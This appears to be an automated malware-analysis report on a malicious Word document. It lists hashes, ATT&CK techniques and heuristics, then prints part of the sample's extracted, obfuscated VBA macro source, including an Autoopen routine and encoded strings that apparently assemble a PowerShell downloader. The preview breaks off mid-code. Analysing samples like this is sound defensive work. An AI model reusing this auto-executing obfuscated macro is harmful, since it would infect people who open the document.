Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e9ce75548681b4a0…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 181.5 KB
Created: 2018-05-18 21:48:00
Authoring application: Microsoft Office Word
First seen: 2018-06-30
MD5: 2297dd78a6db1be39893af39b38ffd4f
SHA-1: 27415aa4ed7fd7c1d8109a78b3c6539ae257df8c
SHA-256: e9ce75548681b4a09ba8de42661a64af79e414d352986880ece749d97d687c28
Risk score: 142

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a Microsoft Office document containing a critical heuristic firing for a Shell() call within VBA macros. The AutoOpen macro is present, indicating it executes automatically upon opening. While the VBA code is heavily obfuscated, the presence of the Shell() call strongly suggests an intent to execute arbitrary commands, likely to download and run a second-stage payload. No specific family could be identified due to the obfuscation.

Heuristics (5)

  • VBA macros detected [medium, 2 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code.
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA.
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 187280 bytes
SHA-256: 009c17f2690e79b829fc30d795ea06b5fd9c12eafa0337666e627d870802aed1

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "GRRvLCFN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub XjjdbV(FQIZIt)
For wKbMF = 42537 To 10028
      For iiAja = 5970 To LrauC
         iSCdqf = ChrB(YSFoK)
      Next
      YnzvMu = 40392 * 20810
      wcsvr = ERzNra + sZiPq
Next
End Sub
Sub oMdMY(ijMvNA)
For ijUZlu = 76612 To 37161
      For AFaTO = 17387 To aMzDRW
         VQULMw = ChrB(VmNKwi)
      Next
      AzVDk = 38581 * 22986
      lEVVo = jQzPHr + IRjbVb
Next
For TNJSaX = 50695 To 29566
      For AjCdwi = 29555 To rJGmVQ
         prZrjl = ChrB(PshDYv)
      Next
      vQLTo = 93613 * 68145
      NAdBt = LVrzzP + jwijpY
Next
For KwuGU = 72495 To 92194
      For uShTKk = 58065 To NirrD
         pFbfa = ChrB(SckwY)
      Next
      uRFXh = 15851 * 77152
      bYQiE = EZVEzj + oGofo
Next
End Sub
Sub jaRii(spNTpw)
For DlvQpz = 51975 To 66166
      For sHfAr = 9833 To KQssz
         sJqhi = ChrB(CrGfI)
      Next
      ccspz = 65310 * 26027
      chKCiD = jCCzDm + tlaIOO
Next
For PmcXmO = 55933 To 26063
      For RKfVb = 20006 To ozfYTp
         iEbdj = ChrB(PrTww)
      Next
      vhivo = 19638 * 42018
      kmYRYi = lIipMZ + tTKluG
Next
End Sub
Sub Autoopen()
On Error Resume Next
For aqjYN = 28210 To 34064
      For DqOzI = 37536 To fKEAVd
         kIknOo = ChrB(kDQPa)
      Next
      vrsLT = 38466 * 51941
      sbPRO = nAjtkc + GXoZAd
Next
LDsnjtzzMnH (TmwhhI + fTiLFLOrV + nRtjB)
For dshUW = 99628 To 80872
      For kXWfw = 35907 To UElTqb
         GchjFz = ChrB(imNiZO)
      Next
      pTDAn = 55394 * 67586
      cBjqK = NINLb + mFnmus
Next
End Sub
Sub BkJzY(biliS)
For wCqAf = 1224 To 28691
      For jVdAWw = 42955 To kjQGvG
         iSEKlj = ChrB(cauIcp)
      Next
      FHlfFq = 60768 * 13421
      aaiAu = RMHsU + hbqcD
Next
For tDFOVj = 61653 To 59119
      For fapPC = 44720 To ijDjv
         IiBkU = ChrB(XjvCCA)
      Next
      DDMFBU = 29948 * 60936
      lSdSpX = GYUvWu + NkLzG
Next
For jXnPQU = 10874 To 34302
      For CPfrWw = 67309 To CtAip
         iEPIhz = ChrB(pWImC)
      Next
      iNCVS = 60396 * 54756
      EPiYZ = iJDGKu + FKALYS
Next
End Sub
Sub NsWEU(EsAYiD)
For Hdokk = 14442 To 40070
      For jTCcHT = 49277 To BJtMT
         MtZDq = ChrB(lIfYG)
      Next
      mbWPbQ = 96099 * 36101
      ZUcMPi = zOoqtw + vLjRu
Next
End Sub

Attribute VB_Name = "XndVZjz"
Sub licOAc(Yzravv)
For QjPoo = 20688 To 51822
      For vzDNJ = 72049 To GmijJN
         LctWdW = ChrB(oqzKN)
      Next
      tGlsn = 11342 * 63087
      cLnSBi = FrOmwk + nvSjE
Next
End Sub
Function fTiLFLOrV()
On Error Resume Next
For GJDCwO = 93535 To 241
      For qtDjt = 66713 To GDcoW
         wlYRmV = ChrB(qaGBp)
      Next
      TIkWnl = 82849 * 9159
      UjPqp = pOEPU + KSiib
Next
For tbJhvL = 36629 To 59850
      For UjwHz = 50439 To DIkjUu
         bWUTnL = ChrB(wDwrGN)
      Next
      csqVA = 41412 * 50521
      YFbdwR = VKFzo + LbsfTf
Next
GoEOXHE = iFtPF("B1zLOUtY+UtYbo-WAUtY+UtYq+WAqwWAq+WAqenWA'+'q(.0Gc", 1420 + 4 - 1420, 1420 + 42 - 1420)
For jzQtN = 66659 To 51954
      For tKTYM = 68680 To OrJOVh
         nlHZZR = ChrB(wqhpE)
      Next
      YoiQO = 81932 * 511
      zmabzN = AVFKo + MfmoIJ
Next
For RRFtX = 336 To 16202
      For mdqmY = 54719 To hjpnZ
         ZWiLJ = ChrB(bRRjPK)
      Next
      ncsFnD = 70936 * 78304
      mXdWVZ = bKBGms + bhNShE
Next
iiLsHiR = iFtPF("Tw0B 63]rahc[,UtYC4dUtY  ECaLperc- 43]rahc[,UtYnFOUtYeCalpEr-)UtY}}{hUt'+'Y+Ut'+'YctUtY+UtYaUtY+UtYc}UtY+UtY;ka'+'UtY+UtYerb;)UtY+UtYCDSC4'+'UtY+UtYd()WUtY+UtYAqmetUtY+UtYI-eWhJd", 97858 + 4 - 97858, 97858 + 171 - 97858)
For zabto = 57478 To 78768
      For Bkoazk = 14081 To mNBYpV
         EsviR = ChrB(ZlDkG)
      Next
      wCdjvE = 2111 * 17239
      SLuKU = aFfjfc + XBtvX
Next
For wHnDi = 15028 To 97989
      For jwTsH
... (truncated)